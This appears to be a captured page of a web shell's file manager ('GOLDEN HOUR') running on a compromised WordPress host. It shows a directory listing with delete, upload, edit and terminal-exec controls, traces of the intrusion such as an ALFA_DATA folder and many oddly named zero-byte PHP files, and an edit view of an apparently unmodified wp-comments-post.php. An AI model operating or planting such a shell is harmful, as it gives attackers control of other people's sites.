GOLDEN HOUR
DIR: /home/vlabbdco/public_html
UP
UPLOAD
Name
Size
Action
.htaccess
0 B
DEL
.htaccess.bak-20260622
523 B
DEL
.htaccess.bk
461 B
DEL
.litespeed_flag
297 B
DEL
[ .tmb ]
-
DEL
[ .well-known ]
-
DEL
.well-known.tar
794.43 MB
DEL
[ .wp-cli ]
-
DEL
422
0 B
DEL
[ ALFA_DATA ]
-
DEL
Cap.php
0 B
DEL
[ LV ]
-
DEL
Savv.php
0 B
DEL
admin.php
0 B
DEL
api.php
0 B
DEL
aztec-kurulum.php
2.12 KB
DEL
[ cgi-bin ]
-
DEL
clear.php
0 B
DEL
content.php
0 B
DEL
[ deac10 ]
-
DEL
defaults.php
0 B
DEL
detail.php
0 B
DEL
domvf.php
1.22 MB
DEL
error_log
869.71 MB
DEL
filefuns.php
0 B
DEL
flap.php
6.93 KB
DEL
fpwch.php
0 B
DEL
goods.php
0 B
DEL
google1588975857979d77.html
53 B
DEL
google3aa33d73ab6fb797.html
53 B
DEL
google679d110b6a88e62d.html
53 B
DEL
google83cb97e9e9aad3d6.html
53 B
DEL
google9aff444a1cf021e8.html
53 B
DEL
googlefb1f327f5209f1ff.html
53 B
DEL
index.php
0 B
DEL
index.php0
0 B
DEL
kilitle.php
0 B
DEL
networks.php
0 B
DEL
new-index.php
0 B
DEL
php.ini
695 B
DEL
product.php
0 B
DEL
products.php
0 B
DEL
qxmesyhqif.php
0 B
DEL
readme.html
7.11 KB
DEL
robots.txt
340 B
DEL
sample.php
648 B
DEL
shop.php
0 B
DEL
[ spbackupB ]
-
DEL
[ wp ]
-
DEL
wp-activate.php
6.93 KB
DEL
wp-add.php
3.27 KB
DEL
[ wp-admin ]
-
DEL
wp-blog-header.php
351 B
DEL
wp-comments-post.php
2.27 KB
DEL
wp-config-sample.php
2.84 KB
DEL
wp-config.php
3.05 KB
DEL
[ wp-content ]
-
DEL
wp-coo.php
0 B
DEL
wp-cron.php
3.85 KB
DEL
wp-events.php
0 B
DEL
[ wp-includes ]
-
DEL
wp-links-opml.php
2.44 KB
DEL
wp-load.php
3.22 KB
DEL
wp-mail.php
8.26 KB
DEL
wp-phpinfo.php
19 B
DEL
wp-settings.php
20.48 KB
DEL
wp-signup.php
30.6 KB
DEL
wp-slgnup.gz
3.49 KB
DEL
wp-sx-generator.php
0 B
DEL
wp-trackback.php
4.7 KB
DEL
xmlrpc.php
3.16 KB
DEL
xmlrpcs.php
0 B
DEL
xmrlpc.php
0 B
DEL
Edit: wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ), true ) ) { $protocol = 'HTTP/1.0'; } header( 'Allow: POST' ); header( "$protocol 405 Method Not Allowed" ); header( 'Content-Type: text/plain' ); exit; } /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = (int) $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( '<p>' . $comment->get_error_message() . '</p>', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Perform other actions when comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
SAVE FILE
TERMINAL
EXEC